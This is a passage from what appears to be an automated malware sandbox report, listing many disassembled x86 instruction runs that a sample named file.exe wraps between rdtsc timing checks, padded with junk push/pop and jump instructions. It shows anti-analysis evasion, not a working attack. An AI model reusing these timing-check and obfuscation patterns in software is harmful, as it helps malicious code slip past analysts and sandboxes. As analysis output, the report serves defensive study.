00007F8480E3138Dh 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 popad 0x00000051 jnl 00007F8480E3138Ch 0x00000057 popad 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c pushad 0x0000005d jl 00007F8480E31388h 0x00000063 pushad 0x00000064 popad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52571E second address: 525730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F8480C71BF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525730 second address: 525736 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525736 second address: 52575A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8480C71BF6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push edx 0x00000014 jo 00007F8480C71BF6h 0x0000001a pop edx 0x0000001b pushad 0x0000001c jng 00007F8480C71BF6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52575A second address: 5257BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F8480E3138Fh 0x0000000c push 00000003h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F8480E31388h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b sbb di, 33CDh 0x00000030 pop ecx 0x00000031 push 00000003h 0x00000033 cmc 0x00000034 push 91C8B8E6h 0x00000039 push eax 0x0000003a push edx 0x0000003b jnp 00007F8480E31395h 0x00000041 jmp 00007F8480E3138Fh 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5257BE second address: 525805 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8480C71BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 2E37471Ah 0x00000013 jmp 00007F8480C71C06h 0x00000018 lea ebx, dword ptr [ebp+12457594h] 0x0000001e or dword ptr [ebp+1245280Bh], esi 0x00000024 xchg eax, ebx 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F8480C71BFDh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5258A1 second address: 5258A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5258A7 second address: 525932 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F8480C71BF6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push esi 0x00000010 mov esi, ecx 0x00000012 pop edx 0x00000013 push 00000000h 0x00000015 add dword ptr [ebp+122D343Ah], edi 0x0000001b jmp 00007F8480C71C07h 0x00000020 push 4B945DF1h 0x00000025 jmp 00007F8480C71C06h 0x0000002a xor dword ptr [esp], 4B945D71h 0x00000031 call 00007F8480C71BFDh 0x00000036 mov esi, dword ptr [ebp+122D19B7h] 0x0000003c pop ecx 0x0000003d push 00000003h 0x0000003f mov esi, dword ptr [ebp+122D214Fh] 0x00000045 push 00000000h 0x00000047 mov dl, E2h 0x00000049 push 00000003h 0x0000004b mov si, dx 0x0000004e call 00007F8480C71BF9h 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jg 00007F8480C71BF6h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525932 second address: 5259BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F8480E31393h 0x00000012 jmp 00007F8480E3138Bh 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F8480E3138Bh 0x00000021 mov eax, dword ptr [eax] 0x00000023 push esi 0x00000024 jmp 00007F8480E31390h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e ja 00007F8480E3138Eh 0x00000034 pop eax 0x00000035 mov dx, D576h 0x00000039 add ecx, 17622E91h 0x0000003f lea ebx, dword ptr [ebp+1245759Dh] 0x00000045 or dword ptr [ebp+122D3432h], ebx 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d jmp 00007F8480E3138Fh 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259BF second address: 5259C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259C3 second address: 5259C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259C7 second address: 5259D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259D6 second address: 5259DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525A61 second address: 525AB1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 call 00007F8480C71BFFh 0x00000017 add di, 8F22h 0x0000001c pop edx 0x0000001d push 00000000h 0x0000001f mov ch, 4Bh 0x00000021 push edx 0x00000022 movsx edx, dx 0x00000025 pop edi 0x00000026 push AD5D9480h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8480C71C09h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525AB1 second address: 525B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8480E31386h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 52A26C00h 0x00000015 mov dword ptr [ebp+122D2F22h], eax 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F8480E31388h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov edi, esi 0x00000039 push 00000000h 0x0000003b pushad 0x0000003c jne 00007F8480E31393h 0x00000042 mov dword ptr [ebp+122D217Bh], edx 0x00000048 popad 0x00000049 push 00000003h 0x0000004b push edi 0x0000004c jp 00007F8480E3138Ch 0x00000052 pop edx 0x00000053 push C42B2218h 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F8480E31399h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525B3A second address: 525BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F8480C71BF6h 0x00000009 jmp 00007F8480C71C09h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 042B2218h 0x00000018 xor dword ptr [ebp+122D1FDAh], ebx 0x0000001e lea ebx, dword ptr [ebp+124575A8h] 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F8480C71BF8h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 jmp 00007F8480C71C04h 0x00000045 jmp 00007F8480C71C00h 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F8480C71C08h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525BD9 second address: 525BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480E31391h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537934 second address: 53795E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8480C71C03h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F8480C71BFCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53795E second address: 537963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547CA1 second address: 547CD1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8480C71BFAh 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8480C71C03h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547CD1 second address: 547CD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545F1F second address: 545F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546342 second address: 54634C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8480E31386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54634C second address: 54635A instructions: 0x00000000 rdtsc 0x00000002 je 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54635A second address: 54635E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5464BE second address: 5464D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8480C71C01h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546767 second address: 546771 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8480E31386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546880 second address: 54688A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5469DE second address: 546A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 je 00007F8480E31386h 0x0000000e pop esi 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8480E31391h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546A03 second address: 546A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546CA4 second address: 546CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510A05 second address: 510A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510A0B second address: 510A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F8480E31388h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 jno 00007F8480E31386h 0x00000016 js 00007F8480E31386h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546DEB second address: 546DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546DEF second address: 546E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8480E31386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F8480E31398h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546E1E second address: 546E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71C00h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8480C71BFDh 0x00000012 jbe 00007F8480C71BF8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546E4B second address: 546E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8480E31386h 0x0000000a jnp 00007F8480E31386h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547695 second address: 54769B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54769B second address: 5476A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547B0D second address: 547B13 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D042 second address: 54D047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D047 second address: 54D064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71C07h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0CE second address: 54F0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0D4 second address: 54F0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F52F second address: 54F56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480E31394h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8480E31398h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F56C second address: 54F581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F581 second address: 54F587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E614 second address: 54E628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jbe 00007F8480C71BF6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F7AB second address: 54F7B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F8DB second address: 54F8DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555E45 second address: 555E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8480E31386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555E4F second address: 555E7E instructions: 0x00000000 rdtsc 0x00000002 je 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F8480C71C0Dh 0x00000010 jmp 00007F8480C71C07h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5565D8 second address: 5565E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F8480E31386h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5565E4 second address: 556605 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007F8480C71BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8480C71C01h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556605 second address: 556621 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8480E31392h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556621 second address: 556627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557023 second address: 557027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55727D second address: 5572CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8480C71C0Ch 0x0000000f jmp 00007F8480C71C06h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007F8480C71C05h 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007F8480C71BF6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55736E second address: 557376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557376 second address: 557383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557383 second address: 557389 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557389 second address: 5573A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480C71C03h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557B39 second address: 557B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F8480E31386h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557B88 second address: 557BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F8480C71BF8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D1A41h], edx 0x0000002c push eax 0x0000002d push edi 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557E24 second address: 557E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557E28 second address: 557E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558077 second address: 55807C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558F02 second address: 558F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 popad 0x0000000a nop 0x0000000b and esi, 229D2A6Eh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F8480C71BF8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jmp 00007F8480C71C06h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F8480C71BF8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push edx 0x0000004f mov si, ax 0x00000052 pop edi 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 ja 00007F8480C71BFCh 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558F89 second address: 558F8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A003 second address: 55A015 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A999 second address: 55A9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480E31394h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B3DB second address: 55B3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8480C71BF6h 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007F8480C71BF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D000 second address: 58D006 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC23 second address: 53AC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC2B second address: 53AC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8480C71BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C22F second address: 58C253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8480E31386h 0x0000000a jmp 00007F8480E31396h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C253 second address: 58C25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597A58 second address: 597A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jo 00007F8480E31386h 0x0000000b jmp 00007F8480E3138Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
